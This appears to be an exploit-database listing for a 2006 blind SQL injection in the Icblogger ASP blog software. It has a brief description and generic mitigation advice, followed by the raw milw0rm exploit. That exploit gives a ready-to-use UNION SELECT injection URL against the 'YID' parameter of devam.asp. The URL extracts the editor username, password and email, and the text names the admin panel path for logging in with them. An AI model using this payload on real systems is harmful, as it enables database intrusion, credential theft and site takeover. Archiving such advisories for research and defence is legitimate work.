header-logo
Suggest Exploit
vendor:
Icblogger
by:
Chironex Fleckeri
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Icblogger
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Icblogger <= "YID" Remote Blind SQL Injection

A remote blind SQL injection vulnerability exists in Icblogger. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of arbitrary data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

################################################################################
##                                                                            ##
##  Icblogger <= "YID" Remote Blind SQL Injection                             ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################

#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################

# milw0rm.com [2006-09-01]